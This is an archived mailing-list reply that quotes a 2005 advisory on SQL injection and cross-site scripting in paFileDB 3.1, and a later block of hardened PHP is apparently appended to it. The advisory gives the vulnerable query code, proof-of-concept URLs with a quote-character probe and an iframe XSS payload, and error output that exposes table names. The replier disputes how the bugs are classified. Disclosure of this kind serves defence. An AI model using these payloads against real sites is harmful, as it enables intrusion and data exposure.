The OpenNET Project
Not SQL injection and XSS in paFileDB?
Date: 12 Mar 2005 21:01:47 -0000
From: saudi linux <ksa2ksa@yahoo.com.>
To: [email protected]
Subject: Not SQL injection and XSS in paFileDB?
X-Virus-Scanned: antivirus-gw at tyumen.ru

In-Reply-To: <20050312182442.22116.qmail@www.securityfocus.com.>

>From: SecurityReason <sp3x@securityreason.com.>
>To: [email protected]
>Subject: [SECURITYREASON.COM]  SQL injection and XSS in paFileDB
>
>
>
>-=[ SecurityReason-2005-SRA#03 ]=-
>
>-=[ SQL injection and XSS in paFileDB ]=-
>
>Author: sp3x
>Date: 12 March 2005
>
>Affected software :
>===================
>paFileDB version : =>3.1
>
>Description :
>=============
>
>paFileDB is designed to allow webmasters to have a database of files for download on their site.
>To add a download, all you do is upload the file using FTP or whatever method you use, log
>into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and
>delete the files too.
>No more messing with a bunch of HTML pages for a file database on your site!
>Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is
>one of the best and easiest ways to manage files!
>
>SQL injection:
>=======================
>
>/includes/viewall.php
>/includes/category.php
>
>Code:
>-------------------------------------------------------------------------------------------------
>if ($sortby == "name") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_name ASC LIMIT $start,20", 0);
>}
>if ($sortby == "date") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_time DESC LIMIT $start,20", 0);
>}
>if ($sortby == "downloads") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_dls DESC LIMIT $start,20", 0);
>}
>if ($sortby == "rating") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
>}
>--------------------------------------------------------------------------------------------------
>
>As we can see, the $start variable is vulnerable to an SQL injection attack.
>But this SQL injection is not critical for now. Why? Because if we want to inject malicious code into the SQL statement
>after "ORDER BY" or after "LIMIT", then in current MySQL versions all we can do is make the SQL request fail. No
>UNIONs etc. When we try to inject an SQL statement we get: "Wrong usage of UNION and ORDER BY Error number: 1221", so we
>must wait until MySQL version 4.1 is widely used; then we can have something like this - "ORDER BY desc ASC LIMIT
>(SELECT our_table FROM pafiledb_admin)...".
>
>Examples:
>=========
>
>Sql injection:
>--------------
>http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
>http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '\',20' at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT \',20
>
>Also in this error message we can see the [prefix] pafiledb tables that should be hidden :) 
>And we can insert XSS code in error message for example :
>
>Cross Site Scripting (XSS):
>--------------------------
>
>http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com>;</iframe>&sortby=rating
>http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com>;</iframe>&sortby=date
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '[Our XSS]',20' at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20
>
>How to fix :
>============
>
>Download the new version of the script or update.
>
>Vendor :
>========
>
>No response
>
>
>Greetz :
>========
>
>Special greetz : cXIb8O3 , pkw :]
>
>Contact :
>=========
>
>sp3x[at]securityreason[dot].com
>www.securityreason.com
>
Dear sp3x,

are you sure this is SQL injection or XSS?

I do not think it's SQL injection because you use an XSS vuln in your bug.

I hope you read more info about SQL injection.
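Both findings in the thread come from the same root cause: the request parameter `start` is interpolated into the query and then reflected in the error page. The following is an added example, not paFileDB's code and not from either poster, showing a hardened version of the quoted listing code; the `$db['prefix']` array is assumed from the quoted snippet, and the query string is returned rather than executed since no database is assumed.

```php
<?php
// Added example (not paFileDB's own code): hardened version of the
// viewall/category listing from the advisory. Two changes:
//  1. $start is validated as a non-negative integer before it reaches
//     LIMIT, so quotes or other text never enter the SQL string.
//  2. $sortby is mapped through a fixed whitelist of ORDER BY clauses.
// Error text shown to the user is HTML-escaped, so a failing query can
// no longer reflect request input as markup (the XSS half of the report).

// Hypothetical stand-in for the table-prefix array used in the quoted snippet.
$db = ['prefix' => 'pafiledb'];

// Allowed sort keys and their ORDER BY clauses (taken from the quoted snippet).
const SORT_CLAUSES = [
    'name'      => 'file_name ASC',
    'date'      => 'file_time DESC',
    'downloads' => 'file_dls DESC',
    'rating'    => '(file_rating/file_totalvotes - 1) DESC',
];

function buildListingQuery(array $db, $start, $sortby): string
{
    // FILTER_VALIDATE_INT rejects "'", "1 OR 1", "0x1" and similar inputs.
    $offset = filter_var($start, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 0]]);
    if ($offset === false) {
        throw new InvalidArgumentException('start must be a non-negative integer');
    }
    if (!array_key_exists($sortby, SORT_CLAUSES)) {
        $sortby = 'name';   // fall back to a default instead of trusting the request
    }
    // $offset is now an int, so interpolating it into LIMIT is safe.
    return "SELECT * FROM {$db['prefix']}_files WHERE file_pin = '0' "
         . "ORDER BY " . SORT_CLAUSES[$sortby] . " LIMIT $offset,20";
}

// Error output that neither echoes the failing query nor reflects raw input as HTML.
function renderDbError(string $detail): string
{
    return '<p>paFileDB was unable to run a MySQL query: '
         . htmlspecialchars($detail, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed inputs mirroring the advisory's probe values.
try {
    echo buildListingQuery($db, "'", 'rating'), "\n";      // rejected
} catch (InvalidArgumentException $e) {
    echo renderDbError($e->getMessage()), "\n";
}
echo buildListingQuery($db, '20', 'rating'), "\n";         // accepted
```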

